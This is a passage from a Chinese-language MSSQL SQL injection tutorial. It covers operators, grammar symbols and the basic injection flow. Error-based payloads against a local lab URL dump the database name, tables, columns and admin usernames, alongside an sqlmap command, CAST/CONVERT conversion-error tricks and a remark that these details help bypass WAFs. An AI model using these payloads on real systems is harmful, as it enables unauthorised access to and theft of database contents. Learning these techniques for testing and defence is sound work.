    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">LIKE </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数与某种模式相匹配,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">NOT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">对任何其他布尔运算符的结果值取反</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">OR </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果两个布尔表达式中的任何一个为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SOME </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果在一组比较中,有些比较为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
   </ol>

0x03 语法定义符号

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">< > 尖括号,用于分隔字符串,字符串为语法元素的名称,SQL语言的非终结符。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">::= 定义操作符。用在生成规则中,分隔规则定义的元素和规则定义。 被定义的元素位于操作符的左边,规则定义位于操作符的右边。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[ ] 方括号表示规则中的可选元素。方括号中的规则部分可以明确指定也可以省略。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">{ } 花括号聚集规则中的元素。在花括号中的规则部分必须明确指定。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">() 括号是分组运算符</span></code></span></span></p></li>
   </ol>

跟mysql一样,熟练的了解这些数据库的符号特性,有利于我们绕过WAF。

第四章 MSSQL注入基本流程

0x00 第一个注入

建议大家可以本地搭建后用sqlmap注入查看他的注入语句

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sqlmap </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">u </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">"http://192.168.130.137/1.aspx?id=1"</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">is</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dba </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">v3</span></code></span></span></p></li>
   </ol>

判断当前数据库

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1'and db_name()>0;--</span></code></span></span></p></li>
   </ol>

爆表名

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');--</span></code></span></span></p></li>
   </ol>

爆列名

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'admin') and name<>'id');--</span></code></span></span></p></li>
   </ol>

爆数据

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1' and 1=(select top 1 username from admin);--</span></code></span></span></p></li>
   </ol>

因为mssql没有limit 所以只能用top 加上后面的判断来遍历数据

0x02 其他用法

当然查询数据库的所有表你还可以使用 INFORMATION_SCHEMA.TABLES

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> INFORMATION_SCHEMA</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">TABLES</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> INFORMATION_SCHEMA</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">COLUMNS </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> TABLE_NAME</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 and 1=(select top 1 table_name from information_schema.tables</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span></code></span></span></p></li>
   </ol>

我们要判断当前表名和列名 也可以使用 having1=1groupby

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 having 1=1</span></code></span></span></p></li>
   </ol>

爆出当前表和字段

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 group by info.id,info.name having 1=1</span></code></span></span></p></li>
   </ol>

爆出所有的字段

第五章 MSSQL注入基本流程

0x00 简介

在上一章我们已经了解到了报错注入,其实MSSQL报错注入利用的就是显示或隐式转换来报错注入,比如以下就是典型的隐式转换

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)></span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">|(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">在将</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> nvarchar </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">值</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'dbo'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">转换成数据类型</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时失败。</span></code></span></span></p></li>
   </ol>

显示转换也就是利用函数来转换,我们经常用到的两个函数就是cast和convert

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CAST</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> expression AS data_type </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CONVERT</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">data_type</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">length</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)],</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> expression </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> style</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">])</span></code></span></span></p></li>
   </ol>
   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CAST</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">USER </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">as</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" 